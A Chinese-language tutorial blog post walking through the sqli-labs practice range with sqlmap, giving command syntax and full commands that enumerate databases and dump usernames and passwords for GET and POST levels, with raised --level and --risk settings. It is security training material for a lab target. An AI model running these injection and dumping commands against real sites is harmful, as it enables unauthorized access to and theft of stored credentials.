衡水專業(yè)網(wǎng)站建設公司抖音推廣網(wǎng)站
這個星期我們用手動注入打了前20關靶場,今天我們用sqlmap直接梭哈前20關
1.介紹sqlmap
sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發(fā)現(xiàn)并利用給定的URL和SQL注入漏洞。
2.下載和使用sqlmap
官方下載地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
下載壓縮包,之后解壓
那怎么使用呢???
打開sqlmap被解壓到的地方,我解壓到了F盤
直接在紅色筐子里輸入cmd,即可打開窗口使用sqlmap
3.sqlmap基本語法
sqlmap是由python寫成
使用方法:python sqlmap.py -參數(shù)
常用用法
1.-h
-h是顯示基本用法
語法:python sqlmap.py -h
2. -u
-u是基礎參數(shù),后面跟需要測試的URL,常用于GET類型的注入
語法:python sqlmap.py -u "URL"
3.--batch
--batch是,可以在所有需要用戶手動輸入的的部分(通常是詢問執(zhí)行yes還是no【樣子是[Y/n]】),執(zhí)行默認操作,不需要用戶再輸入
語法:python sqlmap.py -u "URL" --batch
4.--level 等級
--level是,測試等級,等級越高,測試越復雜,共有五級,當默認集數(shù)測試不出來時??梢蕴岣叩燃?。
語法:python sqlmap.py -u "URL" --level
其余我們在做中介紹。
4.解題
Less-1——Less-10(GET類型)
前十關解法相同,以第一關為例
1.庫名? --dbs 查詢庫名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs
?
2.表名???-D 表名 --tables 查詢表名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security --tables
3.列名??-D 表名 -T 列名 --columns 查詢列名
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users --columns
4.字段? -D 表名 -T 列名 -C 字段 --dump 查詢字段
python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users -C username,password --dump
?
要是這幾關有的查詢不出來,記得還有--level 等級,等級提升這一操作
Less-11——Less-17(POST基礎注入)
從11關開始就需要bp抓包啦
創(chuàng)建一個文本文檔在sqlmap文件夾中,將POST報文保存在文本文檔中!
-r?
代表文檔
語法:python sqlmap.py -r 文本文檔
1.庫名
python sqlmap.py -r 11.txt --batch -dbs
?
2.表名
python sqlmap.py -r 11.txt?--batch -D security --tables
?
3.列名
python sqlmap.py -r 11.txt?--batch -D security -T users --columns
?
4.字段
python sqlmap.py -r 11.txt --batch -D security -T users -C username,password --dump
?
Less15-17這幾關sqlmap跑的特別慢,大家耐心等待,17關記得輸入一個用戶名再抓包!
Less18——Less20
這幾關會發(fā)現(xiàn)爆表爆不出來
提示讓用--level --risk 前面介紹 level了,那什么是risk呢?
“risk”參數(shù)用于控制攻擊的深度,數(shù)值越高,攻擊的幅度越大,但也會增加攻擊被發(fā)現(xiàn)的風險;
//庫名
python sqlmap.py -r 18.txt --batch -dbs --level=3 --risk=3
?之后操作也是一樣的!!!
工具注入還是十分方便,但是還是得熟練手工注入!!!!?